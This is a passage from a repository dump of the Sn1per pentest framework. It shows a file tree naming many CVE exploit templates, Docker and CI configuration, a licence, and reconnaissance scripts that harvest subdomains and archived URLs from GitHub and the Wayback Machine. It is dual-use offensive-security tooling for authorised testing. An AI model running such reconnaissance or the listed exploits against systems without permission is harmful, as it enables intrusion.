├── .github └── workflows │ └── semgrep.yml ├── CHANGELOG.md ├── Dockerfile ├── Dockerfile.blackarch ├── LICENSE.md ├── README.md ├── bin ├── github-subdomains.py ├── http-default-accounts-fingerprints-nndefaccts.lua ├── nmap-bootstrap.xsl ├── pyText2pdf.py ├── report.py ├── samrdump.py ├── slack.sh ├── waybackrobots.py ├── waybackurls.py ├── webscreenshot.js ├── webscreenshot.py └── zap-scan.py ├── conf ├── bug_bounty_full_brute ├── bug_bounty_max_javascript_files ├── bug_bounty_quick ├── bug_bounty_quick_port_80_443_only ├── deep_active_recon ├── default ├── fast_service_portscan ├── super_stealth_mode ├── super_stealth_mode_OSINT ├── web_mode_all_plugins ├── webpwn_only ├── webpwn_only_metasploit_disabled └── zap_only_webscan ├── docker-compose-blackarch.yml ├── docker-compose.yml ├── install.sh ├── loot └── README.md ├── modes ├── airstrike.sh ├── bruteforce.sh ├── discover.sh ├── flyover.sh ├── fullportonly.sh ├── fullportscan.sh ├── javascript-analysis.sh ├── massportscan.sh ├── massvulnscan.sh ├── massweb.sh ├── masswebscan.sh ├── normal.sh ├── normal_webporthttp.sh ├── normal_webporthttps.sh ├── nuke.sh ├── osint.sh ├── osint_stage_2.sh ├── recon.sh ├── sc0pe-active-webscan.sh ├── sc0pe-network-scan.sh ├── sc0pe-passive-webscan.sh ├── sc0pe.sh ├── static-grep-search.sh ├── stealth.sh ├── vulnscan.sh ├── web.sh ├── web_autopwn.sh ├── webporthttp.sh ├── webporthttps.sh └── webscan.sh ├── pro └── notepad.html ├── sn1per.desktop ├── sn1per.png ├── sniper ├── sniper.conf ├── templates ├── active │ ├── AWS_S3_Public_Bucket_Listing.sh │ ├── ApPHP_MicroBlog_Remote_Code_Execution_Vulnerability.sh │ ├── Apache_Solr_Scanner.sh │ ├── Apache_Tomcat_Scanner.sh │ ├── AvantFAX_LOGIN_Detected.sh │ ├── CVE-2018-13379_-_Fortigate_Pulse_Connect_Secure_Directory_Traversal.sh │ ├── CVE-2019-11510_-_Pulse_Connect_Secure_SSL_VPN_Arbitrary_File_Read.sh │ ├── CVE-2019-11580_-_Atlassian_Crowd_Data_Center_Unauthenticated_RCE.sh │ ├── CVE-2019-11581_-_Jira_Template_Injection.sh │ ├── 
CVE-2019-1653_-_Cisco_RV320_RV326_Configuration_Disclosure.sh │ ├── CVE-2019-16662_-_rConfig_3.9.2_Remote_Code_Execution.sh │ ├── CVE-2019-16759_-_vBulletin_5.x_0-Day_Pre-Auth_Remote_Command_Execution.sh │ ├── CVE-2019-16759_-_vBulletin_5.x_0-Day_Pre-Auth_Remote_Command_Execution_Bypass.sh │ ├── CVE-2019-17558_-_Apache_Solr_RCE.sh │ ├── CVE-2019-19719_Tableau_Server_DOM_XSS.py │ ├── CVE-2019-19781_-_Citrix_ADC_Directory_Traversal.sh │ ├── CVE-2019-19908_-_phpMyChat-Plus_XSS.sh │ ├── CVE-2019-5418_-_Rail_File_Content_Disclosure.sh │ ├── CVE-2019-6340_-_Drupal8_REST_RCE_SA-CORE-2019-003.disabled │ ├── CVE-2019-7192_-_QNAP_Pre-Auth_Root_RCE.sh │ ├── CVE-2019-8442_-_Jira_Webroot_Directory_Traversal_1.sh │ ├── CVE-2019-8442_-_Jira_Webroot_Directory_Traversal_2.sh │ ├── CVE-2019-8451_Jira_SSRF_1.sh │ ├── CVE-2019-8451_Jira_SSRF_2.sh │ ├── CVE-2019-8451_Jira_SSRF_3.sh │ ├── CVE-2019-8451_Jira_SSRF_4.sh │ ├── CVE-2019-8903_-_Totaljs_Unathenticated_Directory_Traversal.sh │ ├── CVE-2019-8982_-_Wavemaker_Studio_6.6_LFI_SSRF.sh │ ├── CVE-2020-0618_-_Remote_Code_Execution_SQL_Server_Reporting_Services.sh │ ├── CVE-2020-10204_-_Sonatype_Nexus_Repository_RCE.sh │ ├── CVE-2020-1147_-_Remote_Code_Execution_in_Microsoft_SharePoint_Server.sh │ ├── CVE-2020-11530_-_Wordpress_Chop_Slider_3_Plugin_SQL_Injection.sh │ ├── CVE-2020-11738_-_WordPress_Duplicator_plugin_Directory_Traversal.sh │ ├── CVE-2020-11738_-_WordPress_Duplicator_plugin_Directory_Traversal_2.sh │ ├── CVE-2020-11738_-_WordPress_Duplicator_plugin_Directory_Traversal_3.sh │ ├── CVE-2020-11738_-_WordPress_Duplicator_plugin_Directory_Traversal_4.sh │ ├── CVE-2020-12271_-_Sophos_XG_Firewall_Pre-Auth_SQL_Injection.sh │ ├── CVE-2020-12720_-_vBulletin_Unauthenticaed_SQLi_1.sh │ ├── CVE-2020-12720_-_vBulletin_Unauthenticaed_SQLi_2.sh │ ├── CVE-2020-12720_-_vBulletin_Unauthenticaed_SQLi_3.sh │ ├── CVE-2020-13167_-_Netsweeper_WebAdmin_Python_Code_Injection_1.sh │ ├── CVE-2020-13167_-_Netsweeper_WebAdmin_Python_Code_Injection_2.sh │ 
├── CVE-2020-14181_-_User_Enumeration_Via_Insecure_Jira_Endpoint.sh │ ├── CVE-2020-14815_-_Oracle_Business_Intelligence_Enterprise_DOM_XSS.sh │ ├── CVE-2020-15129_-_Open_Redirect_In_Traefik.sh │ ├── CVE-2020-15920_-_Mida_eFramework_Unauthenticated_RCE.sh │ ├── CVE-2020-17519_-_Apache_Flink_Path_Traversal.sh │ ├── CVE-2020-2034_-_PAN-OS_GlobalProtect_OS_Command_Injection.sh │ ├── CVE-2020-2096_-_Jenkins_Gitlab_Hook_XSS.sh │ ├── CVE-2020-2096_Jenkins_Gitlab_XSS_1.sh │ ├── CVE-2020-2096_Jenkins_Gitlab_XSS_2.sh │ ├── CVE-2020-2096_Jenkins_Gitlab_XSS_3.sh │ ├── CVE-2020-2096_Jenkins_Gitlab_XSS_4.sh │ ├── CVE-2020-2140_-_Jenkin_AuditTrailPlugin_XSS.sh │ ├── CVE-2020-24223_-_Mara_CMS_7.5_Reflective_XSS.sh │ ├── CVE-2020-25213_-_WP_File_Manager_File_Upload.sh │ ├── CVE-2020-2551_-_Unauthenticated_Oracle_WebLogic_Server_Remote_Code_Execution.sh │ ├── CVE-2020-2555_-_WebLogic_Server_Deserialization_RCE.sh │ ├── CVE-2020-3187_-_Citrix_Unauthenticated_File_Deletion.sh │ ├── CVE-2020-3452_-_Cisco_ASA-FTD_Arbitrary_File_Reading_Vulnerability.sh │ ├── CVE-2020-5284_-_Next_JS_Limited_Path_Traversal.sh │ ├── CVE-2020-5405_-_Spring_Directory_Traversal_1.sh │ ├── CVE-2020-5405_-_Spring_Directory_Traversal_2.sh │ ├── CVE-2020-5405_-_Spring_Directory_Traversal_3.sh │ ├── CVE-2020-5412_-_Full-read_SSRF_in_Spring_Cloud_Netflix.sh │ ├── CVE-2020-5902_-_F5_BIG-IP_Remote_Code_Execution_1.sh │ ├── CVE-2020-5902_-_F5_BIG-IP_Remote_Code_Execution_2.sh │ ├── CVE-2020-5902_-_F5_BIG-IP_XSS.sh │ ├── CVE-2020-6287_-_Create_an_Administrative_User_in_SAP_NetWeaver_AS_JAVA.sh │ ├── CVE-2020-7048_-_WP_Database_Reset_3.15_Unauthenticated_Database_Reset.sh │ ├── CVE-2020-7209_-_LinuxKI_Toolset_6.01_Remote_Command_Execution.sh │ ├── CVE-2020-7246_-_qdPM_Authenticated_Remote_Code_Execution.sh │ ├── CVE-2020-7473_Citrix_ShareFile_StorageZones.disabled │ ├── CVE-2020-8115_-_Revive_Adserver_XSS.py │ ├── CVE-2020-8115_-_Revive_Adserver_XSS.sh │ ├── CVE-2020-8163_-_Rails_5.0.1_Remote_Code_Execution.sh │ ├── 
CVE-2020-8191_-_Citrix_ADC_NetScaler_Gateway_Reflected_XSS.sh │ ├── CVE-2020-8193_-_Citrix_Unauthenticated_LFI.sh │ ├── CVE-2020-8194_-_Citrix_ADC_NetScaler_Gateway_Reflected_Code_Injection.sh │ ├── CVE-2020-8209_-_Citrix_XenMobile_Server_Path_Traversal.sh │ ├── CVE-2020-8209_-_XenMobile-Citrix_Endpoint_Management_Config_Password_Disclosure.sh │ ├── CVE-2020-8209_-_XenMobile-Citrix_Endpoint_Management_Path_Traversal.sh │ ├── CVE-2020-8512_-_IceWarp_WebMail_XSS.sh │ ├── CVE-2020-8772_-_IfiniteWP_Client_1.9.4.5_Authentication_Bypass_1.sh │ ├── CVE-2020-8982_-_Citrix_ShareFile_StorageZones_Unauthenticated_Arbitrary_File_Read.sh │ ├── CVE-2020-9047_-_exacqVision_Web_Service_Remote_Code_Execution.sh │ ├── CVE-2020-9054_-_ZyXEL_NAS_Remote_Code_Execution.sh │ ├── CVE-2020-9484_-_Apache_Tomcat_RCE_by_deserialization.sh │ ├── CVE-2020-9757_-_SEOmatic_3.3.0_Server-Side_Template_Injection.sh │ ├── Cisco_VPN_Login_Scanner.sh │ ├── Cisco_VPN_Scanner.sh │ ├── Citrix-Access-Gateway_Detected.sh │ ├── Citrix_VPN_Scanner.sh │ ├── Citrix_VPN_Scanner_2.sh │ ├── Clear-text_Communications_HTTP.sh │ ├── Clickjacking.sh │ ├── Common_Status_File_Scanner_1.sh │ ├── Common_Status_File_Scanner_2.sh │ ├── Common_Status_File_Scanner_3.sh │ ├── Confluence_Scanner.sh │ ├── Contact_Form_7_Wordpress_Plugin_Found_1.sh │ ├── Contact_Form_7_Wordpress_Plugin_Found_2.sh │ ├── Directory_Listing_Enabled.sh │ ├── Drupal_Install_Found.sh │ ├── Drupal_Scanner_1.sh │ ├── Drupal_Scanner_2.sh │ ├── Drupal_Scanner_3.sh │ ├── Drupal_User_Login.sh │ ├── Drupal_Version_Disclosure.sh │ ├── F5_BIG-IP_Scanner.sh │ ├── F5_BIG-IP_Scanner_2.sh │ ├── Fortigate_Pulse_Connect_Secure_Scanner.sh │ ├── Fortinet_FortiGate_SSL_VPN_Panel_Detected.sh │ ├── Fortinet_FortiGate_SSL_VPN_Panel_Detected_1.sh │ ├── Fortinet_FortiGate_SSL_VPN_Panel_Detected_2.sh │ ├── Fortinet_FortiGate_SSL_VPN_Panel_Detected_3.sh │ ├── Frontpage_Service_Password_Disclosure.sh │ ├── Git_Config_Detected.sh │ ├── JK_Status_Manager.sh │ ├── 
Jaspersoft_Detected.sh │ ├── Jenkins_Scanner.sh │ ├── Jetty_Version_Disclosure.sh │ ├── Jira_Scanner_1.sh │ ├── Jira_Scanner_2.sh │ ├── Jira_Scanner_3.sh │ ├── Jolokia_Version_Disclosure.sh │ ├── Joomla_Scanner_1.sh │ ├── Joomla_Scanner_2.sh │ ├── Joomla_Version_Disclosure.sh │ ├── Laraval_Environment_File_Found.sh │ ├── MS_SQL_Reporting_Server_Scanner_1.sh │ ├── MS_SQL_Reporting_Server_Scanner_2.sh │ ├── Magento_2.3.0_SQL_Injection.sh │ ├── Mailman_Version_Disclosure.sh │ ├── MobileIron_Login_1.sh │ ├── MobileIron_Login_2.sh │ ├── MobileIron_Login_3.sh │ ├── PHP_Composer_Disclosure.sh │ ├── PHP_Info.sh │ ├── Palo_Alto_GlobalProtect_PAN-OS_Portal_Scanner.sh │ ├── PulseSecure_VPN_Detected.sh │ ├── RabbitMQ_Management_Default_Credentials.sh │ ├── RabbitMQ_Management_Interface_Detected.sh │ ├── Robots.txt_Detected.sh │ ├── SAP_NetWeaver_AS_JAVA_LM_Configuration_Wizard_Detection.sh │ ├── SQLiteManager_Scanner_1.sh │ ├── Sitemap.xml_Detected.sh │ ├── SolarWinds_Orion_Default_Credentials_1.sh │ ├── SolarWinds_Orion_Default_Credentials_2.sh │ ├── SolarWinds_Orion_Panel.sh │ ├── TeamQuest_Login_Found.sh │ ├── Telerik_File_Upload_Web_UI.sh │ ├── Tiki_Wiki_CMS_Groupware_Scanner.sh │ ├── Unauthenticated_Jenkins_Dashboard_Detected.sh │ ├── VMware_vCenter_Unauthenticated_Arbitrary_File_Read.sh │ ├── Weak_Authentication_Scanner.sh │ ├── WebLogic_Scanner.sh │ ├── Web_Config_Detected.sh │ ├── Weblogic_Application_Server_Detected.sh │ ├── Wordpres_Scanner_1.sh │ ├── Wordpres_Scanner_2.sh │ ├── Wordpres_Scanner_3.sh │ ├── Wordpress_WP-File-Manager_Version_Detected.sh │ ├── XSS.py │ ├── cPanel_Login_Found.sh │ ├── cPanel_Login_Found_2.sh │ └── phpMyAdmin_Scanner_1.sh └── passive │ ├── network │ ├── CVE-2018-15473_-_OpenSSH_Username_Enumeration.sh │ ├── Default_Credentials_BruteX.sh │ ├── Default_Credentials_NMap.sh │ ├── Interesting_Domain_Found.sh │ ├── Lack_of_SPF_DNS_Record.sh │ ├── Possible_Takeover_Detected.sh │ ├── SMB_Info_Disclosure.sh │ ├── SMBv1_Enabled.sh │ ├── 
SSH_Version_Disclosure.sh │ ├── Subjack_Takeover_Detected.sh │ ├── Subover_Takeover_Detected.sh │ └── recursive │ │ ├── Component_With_Known_Vulnerabilities_-_NMap.sh │ │ └── Interesting_Ports_Found.sh │ └── web │ ├── Autocomplete_Enabled.sh │ ├── CORS_Policy_-_Allow-Credentials_Enabled.sh │ ├── CORS_Policy_-_Allow-Origin_Wildcard.sh │ ├── CSP_Not_Enforced.sh │ ├── Clear-text_Communications_HTTP.sh │ ├── Clickjacking.sh │ ├── Drupal_Detected.sh │ ├── Expired_SSL_Certificate.sh │ ├── Fortinet_FortiGate_SSL_VPN_Panel_Passive_Detection.sh │ ├── Insecure_Cookie_-_HTTPOnly_Not_Set.sh │ ├── Insecure_Cookie_-_Secure_Not_Set.sh │ ├── Insecure_SSL_TLS_Connection.sh │ ├── Insecure_SSL_TLS_Connection_CN_Mismatch.sh │ ├── Interesting_Title_Found.sh │ ├── Server_Header_Disclosure.sh │ ├── Strict_Tranposrt_Security_Not_Enforced.sh │ ├── Trace_Method_Enabled.sh │ ├── X-Powered-By_Header_Found.sh │ └── recursive │ ├── Arachni_Vulnerability_Scan.disabled │ ├── Arachni_Vulnerability_Scan_-_HTTP.sh │ ├── Arachni_Vulnerability_Scan_-_HTTPS.sh │ ├── Nikto_Vulnerability_Scan-HTTP.sh │ ├── Nikto_Vulnerability_Scan-HTTPS.sh │ ├── Nuclei_Vulnerability_Scan_-_HTTP.sh │ ├── Nuclei_Vulnerability_Scan_-_HTTPS.sh │ ├── OWASP_Zap_Scan_-_HTTP.sh │ ├── OWASP_Zap_Scan_-_HTTPS.sh │ ├── Wordpress_Vulnerability_Scan_-_HTTPS_1.sh │ ├── Wordpress_Vulnerability_Scan_-_HTTPS_2.sh │ ├── Wordpress_Vulnerability_Scan_-_HTTP_1.sh │ └── Wordpress_Vulnerability_Scan_-_HTTP_2.sh ├── uninstall.sh └── wordlists ├── altdns.txt ├── domains-default.txt ├── domains-quick.txt ├── vhosts.txt ├── web-brute-common.txt ├── web-brute-exploits.txt ├── web-brute-full.txt ├── web-brute-stealth.txt └── web-brute-vulnerabilities.txt /.github/workflows/semgrep.yml: -------------------------------------------------------------------------------- 1 | on: 2 | workflow_dispatch: {} 3 | pull_request: {} 4 | push: 5 | branches: 6 | - main 7 | - master 8 | paths: 9 | - .github/workflows/semgrep.yml 10 | schedule: 11 | # random HH:MM to 
    # avoid a load spike on GitHub Actions at 00:00
    - cron: 2 23 * * *
name: Semgrep
jobs:
  semgrep:
    name: semgrep/ci
    # NOTE(review): GitHub has been retiring the ubuntu-20.04 hosted runner
    # label; confirm it is still served, otherwise this scheduled job will
    # stop running silently.
    runs-on: ubuntu-20.04
    env:
      # Semgrep Cloud token from the repository secrets; it is exposed to
      # whichever image the floating tag below resolves to at run time.
      SEMGREP_APP_TOKEN: ${{ secrets.SEMGREP_APP_TOKEN }}
    container:
      # Floating tag (no version or digest): the scan runs whatever image
      # is current when the job starts, so results are not reproducible.
      image: returntocorp/semgrep
    steps:
      # Supply-chain note: @v3 is a mutable tag; pinning the action to a
      # full commit SHA prevents a moved tag from changing what runs here.
      - uses: actions/checkout@v3
      - run: semgrep ci
--------------------------------------------------------------------------------
/Dockerfile:
--------------------------------------------------------------------------------
# Unpinned rolling base image: every build starts from whatever
# kali-rolling:latest resolves to, so two builds can differ.
FROM docker.io/kalilinux/kali-rolling:latest

LABEL org.label-schema.name='Sn1per - Kali Linux' \
      org.label-schema.description='Automated pentest framework for offensive security experts' \
      org.label-schema.usage='https://github.com/1N3/Sn1per' \
      org.label-schema.url='https://github.com/1N3/Sn1per' \
      org.label-schema.vendor='https://sn1persecurity.com' \
      org.label-schema.schema-version='1.0' \
      org.label-schema.docker.cmd.devel='docker run --rm -ti xer0dayz/sniper' \
      MAINTAINER="@xer0dayz"

# Replaces the apt sources with plain-http Kali mirrors; apt still checks
# the signed index, but it is fetched unencrypted.
RUN echo "deb http://http.kali.org/kali kali-rolling main contrib non-free" > /etc/apt/sources.list && \
    echo "deb-src http://http.kali.org/kali kali-rolling main contrib non-free" >> /etc/apt/sources.list
ENV DEBIAN_FRONTEND noninteractive

RUN set -x \
    && apt -yqq update \
    && apt -yqq full-upgrade \
    && apt clean
RUN apt install --yes metasploit-framework

# Rewrites msfdb's "systemctl status" call into a "service ... status"
# call (presumably because systemctl is unavailable in the container),
# then initialises the msf database at build time.
RUN sed -i 's/systemctl status ${PG_SERVICE}/service ${PG_SERVICE} status/g' /usr/bin/msfdb && \
    service postgresql start && \
    msfdb reinit

WORKDIR /usr/src/app

RUN apt --yes install git bash
# Clones the current default branch and then self-updates ("sniper -u
# force") during the build, so the image content depends on the moment it
# was built rather than on a tagged release.
RUN git clone https://github.com/1N3/Sn1per.git \
    && cd Sn1per \
    && ./install.sh \
    && sniper -u force

# No USER instruction: the process runs as root inside the container.
CMD ["sniper"]
--------------------------------------------------------------------------------
/Dockerfile.blackarch:
-------------------------------------------------------------------------------- 1 | FROM docker.io/blackarchlinux/blackarch:latest 2 | 3 | # Upgrade system 4 | RUN pacman -Syu --noconfirm 5 | 6 | # Install sn1per from official repository 7 | RUN pacman -Sy sn1per --noconfirm 8 | 9 | CMD ["sn1per"] -------------------------------------------------------------------------------- /LICENSE.md: -------------------------------------------------------------------------------- 1 | ## LICENSE: 2 | Sn1per Community Edition End User License Agreement (EULA) 3 | 4 | Sn1perSecurity LLC grants you the right to download, use, and distribute in part or in whole Sn1per Community Edition (also referred to as “Project”, “Code”, “Software”, “Sn1per”, “Product”), provided the following terms and conditions are met: 5 | 6 | (1) You agree to give credit to the original author @xer0dayz and link back to https://sn1persecurity.com (Sn1perSecurity LLC) 7 | (2) You may not rename or rebrand the Project. 8 | (3) You agree not to create any product or service from any part of the Code from this Project, paid or free. 9 | (4) You agree not to re-license the Code. 10 | (5) You may not use the Code for illegal or nefarious purposes, which violates any laws (in your jurisdiction, the jurisdiction in which the Software is running, the jurisdiction in which the Software is targeting, and the United States of America). 11 | (6) You agree not to scan a target in a manner that is considered unlawful, illegal, or that you do not have explicit permission to do so. 12 | 13 | This Software is provided as-is without warranty. Sn1perSecurity LLC, its creators and staff take no liability for consequential damages to the maximum extent permitted by all applicable laws. 
In no event shall Sn1perSecurity LLC or any person be liable for any consequential, reliance, incidental, special, direct or indirect damages whatsoever (including without limitation, damages for loss of business profits, business interruption, loss of business information, personal injury, or any other loss) arising out of or in connection with the use or inability to use this Product, even if Sn1perSecurity LLC has been advised of the possibility of such damages. 14 | 15 | Sn1perSecurity LLC does not guarantee any functionality or performance of Sn1per Community Edition. Sn1perSecurity LLC does not warrant that the Code will be maintained and in good working order, or that the Software will meet your requirements, be uninterrupted, or error free, or that any errors in the Software will be corrected. 16 | 17 | The Software code, name, and logos are owned by Sn1perSecurity LLC and protected by the United States of America and the state of Arizona copyright and/or patent laws of international treaty provisions. All rights reserved. 18 | 19 | Sn1perSecurity LLC reserves the right to change the licensing terms at any time, without advance notice. Sn1perSecurity LLC reserves the right to terminate your license at any time. 20 | 21 | If any provision of this EULA is determined to be unlawful, void, or unenforceable, such provision shall nonetheless be enforceable to the fullest extent permitted by applicable law, and the unenforceable portion shall be deemed to be severed from this EULA. Such determination shall not affect the validity and enforceability of any remaining provisions. 22 | 23 | Failure of Sn1perSecurity LLC to exercise or enforce any right or provision of this EULA does not constitute a waiver of such right or provision. 24 | 25 | Any ambiguities in the interpretation of this EULA shall not be construed against the drafting party/parties. 
Download, use, distribution (in part or in whole) of this Project/Code constitutes your acceptance of the Sn1per Community Edition EULA. If at any time you are not in agreement or cannot meet any part of this EULA, you should immediately cease use of the Project by removing/uninstalling all copies from all locations.

For any questions concerning this EULA, please submit a GitHub issue with your question: https://github.com/1N3/Sn1per

--------------------------------------------------------------------------------
/bin/github-subdomains.py:
--------------------------------------------------------------------------------
#!/usr/bin/python3.5

# I don't believe in license.
# You can do whatever you want with this program.

import os
import sys
import re
import time
import requests
import random
import argparse
from functools import partial
from colored import fg, bg, attr
from multiprocessing.dummy import Pool


# GitHub tokens, one per line, stored next to this script. Read by the
# argument handling further down when no -t/--token is given.
TOKENS_FILE = os.path.dirname(os.path.realpath(__file__)) + '/.tokens'


def githubApiSearchCode(search, page):
    """Run one page of a GitHub code search and return the decoded JSON.

    A token is picked at random from the module-level t_tokens list on
    every call, spreading the requests over all configured tokens.
    Returns False (after printing the error) when the request fails or
    the body is not JSON; error answers from the API are returned as-is
    so the caller can inspect them (it looks for a 'documentation_url'
    key).
    """
    token = random.choice(t_tokens)
    headers = {"Authorization": "token " + token}
    url = (
        'https://api.github.com/search/code?s=indexed&type=Code&o=desc&q='
        + search + '&page=' + str(page)
    )

    try:
        r = requests.get(url, headers=headers, timeout=5)
        return r.json()
    except Exception as e:
        print("%s[-] error occurred: %s%s" % (fg('red'), e, attr(0)))
        return False


def getRawUrl(result):
    """Turn a search hit's html_url into its raw.githubusercontent.com URL."""
    html_url = result['html_url']
    raw_url = html_url.replace('https://github.com/', 'https://raw.githubusercontent.com/')
    return raw_url.replace('/blob/', '/')


def readCode(regexp, source, result):
    """Fetch one search hit and print every new hostname matching regexp."""
    url = getRawUrl(result)
    code = doGetCode(url)

    if code:
        matches = re.findall(regexp,
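code )
        if matches:
            for sub in matches:
                # findall() yields tuples here: both regexps built below wrap
                # the whole pattern in a capture group, so element 0 is the
                # full match.
                sub = sub[0].replace('2F', '').lower().strip()
                # NOTE(review): t_history is shared by the worker threads
                # without a lock, so a host found by two workers at the same
                # time can still be printed twice.
                if sub and sub not in t_history:
                    t_history.append(sub)
                    sys.stdout.write("%s" % sub)
                    if source:
                        sys.stdout.write("\t-> %s" % result['html_url'])
                    sys.stdout.write("\n")


def doGetCode(url):
    """Fetch *url* and return the response body as text.

    Returns False (after printing the error) only when the request itself
    fails, e.g. on a timeout. No status check is made: a non-2xx body is
    returned like any other.
    """
    try:
        r = requests.get(url, timeout=5)
    except Exception as e:
        sys.stdout.write("%s[-] error occurred: %s%s\n" % (fg('red'), e, attr(0)))
        return False

    return r.text


parser = argparse.ArgumentParser()
parser.add_argument("-t", "--token", help="auth token (required)")
parser.add_argument("-d", "--domain", help="domain you are looking for (required)")
parser.add_argument("-e", "--extend", help="also look for example.com", action="store_true")
parser.add_argument("-s", "--source", help="display first url where subdomains are found", action="store_true")
args = parser.parse_args()

# Tokens come from -t (comma separated) or, failing that, one per line in
# the .tokens file next to this script. Blank entries are dropped: the
# previous split("\n") kept the empty string after the file's trailing
# newline, which passed the emptiness check below and could then be picked
# by random.choice(), producing a bare "token " header.
t_tokens = []
if args.token:
    t_tokens = [t.strip() for t in args.token.split(',') if t.strip()]
else:
    if os.path.isfile(TOKENS_FILE):
        with open(TOKENS_FILE, 'r') as fp:
            t_tokens = [line.strip() for line in fp if line.strip()]

if not t_tokens:
    parser.error('auth token is missing')

_source = bool(args.source)

if args.domain:
    _domain = args.domain
else:
    parser.error('domain is missing')

t_history = []
page = 1
_search = '"' + _domain + '"'

### this is a test, looks like we got more result that way
# Searching for the registered domain label alone (e.g. "example" rather
# than "example.com") returns more hits.
import tldextract
t_host_parse = tldextract.extract(_domain)
_search = '"' + t_host_parse.domain + '"'
###

# egrep -io "[0-9a-z_\-\.]+\.([0-9a-z_\-]+)?`echo $h|awk -F '.'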
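# '{print $(NF-1)}'`([0-9a-z_\-\.]+)?\.[a-z]{1,5}"


if args.extend:
    # Raw strings throughout: '\-' and '\.' are not Python escape sequences,
    # and a plain literal only kept them by accident (with a SyntaxWarning on
    # recent interpreters). The regex text itself is unchanged.
    # NOTE(review): t_host_parse.domain is inserted unescaped; registered
    # domain labels are alphanumerics and '-', so this is harmless in
    # practice, but re.escape() would make the intent explicit.
    _regexp = r'([0-9a-z_\-\.]+\.([0-9a-z_\-]+)?' + t_host_parse.domain + r'([0-9a-z_\-\.]+)?\.[a-z]{1,5})'
else:
    _regexp = r'(([0-9a-zA-Z_\-\.]+)\.' + _domain.replace('.', r'\.') + ')'

# Page through the search results until GitHub stops returning items or
# answers with an error document (those carry 'documentation_url' instead
# of 'items'). Each page is fetched and scanned by a pool of worker threads.
while True:
    time.sleep(1)
    t_json = githubApiSearchCode(_search, page)
    page += 1

    if not t_json or 'documentation_url' in t_json or 'items' not in t_json or not t_json['items']:
        break

    pool = Pool(30)
    pool.map(partial(readCode, _regexp, _source), t_json['items'])
    pool.close()
    pool.join()
--------------------------------------------------------------------------------
/bin/report.py:
--------------------------------------------------------------------------------
import sys

import pdfkit

# Defaults kept from the original one-off invocation so existing callers
# see no change; an HTML report path and an output file may now be passed
# as the first and second command-line argument instead.
DEFAULT_REPORT_HTML = '/usr/share/sniper/loot/workspace/hulu/sniper-report.html'
DEFAULT_OUT_PDF = 'out.pdf'

report_html = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_REPORT_HTML
out_pdf = sys.argv[2] if len(sys.argv) > 2 else DEFAULT_OUT_PDF

# NOTE(review): the report HTML is built from scan output, i.e. content
# collected from scanned hosts; check which local-file-access default the
# installed wkhtmltopdf version applies before rendering it.
pdfkit.from_url(report_html, out_pdf)
--------------------------------------------------------------------------------
/bin/slack.sh:
--------------------------------------------------------------------------------
#!/bin/bash
# Slack API Integration script for Sn1per
# By @xer0dayz - https://sn1persecurity.com
#

source /usr/share/sniper/sniper.conf 2> /dev/null
source /root/.sniper.conf 2> /dev/null
source /root/.sniper_api_keys.conf 2> /dev/null

MESSAGE="$1"

if [ "$MESSAGE" == "postfile" ]; then
    FILENAME="$2"
    curl -F "file=@$FILENAME" -F "initial_comment=$FILENAME" -F "channels=$SLACK_CHANNEL" -H "Authorization: Bearer $SLACK_API_TOKEN" https://slack.com/api/files.upload 2> /dev/null > /dev/null
else
    # The message is interpolated into a JSON document. Scan output (target
    # names, page titles) can contain backslashes or double quotes, which
    # would otherwise break or alter the payload; escape those two
    # characters and quote the webhook URL so it is not word-split.
    JSON_MESSAGE="${MESSAGE//\\/\\\\}"
    JSON_MESSAGE="${JSON_MESSAGE//\"/\\\"}"
    curl -X POST -H 'Content-type: application/json' --data "{\"text\":\"$JSON_MESSAGE\"}" "$SLACK_WEBHOOK_URL" 2> /dev/null > /dev/null
fi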
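--------------------------------------------------------------------------------
/bin/waybackrobots.py:
--------------------------------------------------------------------------------
import requests
import re
import sys
from multiprocessing.dummy import Pool

# Without a timeout a stalled Wayback Machine connection blocks the scan
# indefinitely; bound every request.
REQUEST_TIMEOUT = 30


def robots(host):
    """Return [timestamp, original] pairs for archived robots.txt captures of *host*.

    Queries the Wayback CDX API for captures with status 200, collapsed by
    digest so identical copies appear once. Returns an empty list when
    nothing was archived.
    """
    r = requests.get(
        'https://web.archive.org/cdx/search/cdx'
        '?url=%s/robots.txt&output=json&fl=timestamp,original&filter=statuscode:200&collapse=digest' % host,
        timeout=REQUEST_TIMEOUT)
    results = r.json()
    if not results:  # might find nothing
        return []
    results.pop(0)  # The first item is ['timestamp', 'original']
    return results


def getpaths(snapshot):
    """Fetch one archived capture and return the paths it mentions.

    The body is only treated as a robots.txt when it contains 'Disallow:',
    which filters out archive error pages. Every run of text from a '/' to
    the end of its line is returned.
    """
    url = 'https://web.archive.org/web/{0}/{1}'.format(snapshot[0], snapshot[1])
    robotstext = requests.get(url, timeout=REQUEST_TIMEOUT).text
    if 'Disallow:' in robotstext:  # verify it's actually a robots.txt file, not 404 page
        return re.findall('/.*', robotstext)
    return []


if __name__ == '__main__':
    if len(sys.argv) < 2:
        print('Usage:\n\tpython3 waybackrobots.py ')
        sys.exit()

    host = sys.argv[1]

    snapshots = robots(host)
    print('Found %s unique results' % len(snapshots))
    if not snapshots:
        sys.exit()
    print('This may take some time...')
    with Pool(4) as pool:
        paths = pool.map(getpaths, snapshots)
    unique_paths = set()
    for found in paths:
        unique_paths.update(found)
    filename = '%s-robots.txt' % host
    with open(filename, 'w') as f:
        f.write('\n'.join(unique_paths))
    print('[*] Saved results to %s' % filename)
--------------------------------------------------------------------------------
/bin/waybackurls.py:
--------------------------------------------------------------------------------
import requests
import sys
import json

# Bound the CDX query so a stalled connection cannot hang the scan.
REQUEST_TIMEOUT = 30


def waybackurls(host, with_subs):
    """Return every URL the Wayback Machine has archived for *host*.

    With *with_subs* true the query also covers subdomains (*.host). The
    first row of the CDX JSON answer is the column header and is dropped,
    so an empty answer yields an empty list.
    """
    if with_subs:
        url = 'http://web.archive.org/cdx/search/cdx?url=*.%s/*&output=json&fl=original&collapse=urlkey' % host
    else:
        url = 'http://web.archive.org/cdx/search/cdx?url=%s/*&output=json&fl=original&collapse=urlkey' % host
    r = requests.get(url, timeout=REQUEST_TIMEOUT)
    results = r.json()
    return results[1:]


if __name__ == '__main__':
    argc = len(sys.argv)
    if argc < 2:
        print('Usage:\n\tpython3 waybackurls.py ')
        sys.exit()

    host = sys.argv[1]
    # Any argument after the host turns subdomain matching on. The previous
    # test (argc > 3) needed two extra arguments, so a single flag after the
    # host was silently ignored.
    with_subs = argc > 2

    urls = waybackurls(host, with_subs)
    json_urls = json.dumps(urls)
    if urls:
        filename = '%s-waybackurls.json' % host
        with open(filename, 'w') as f:
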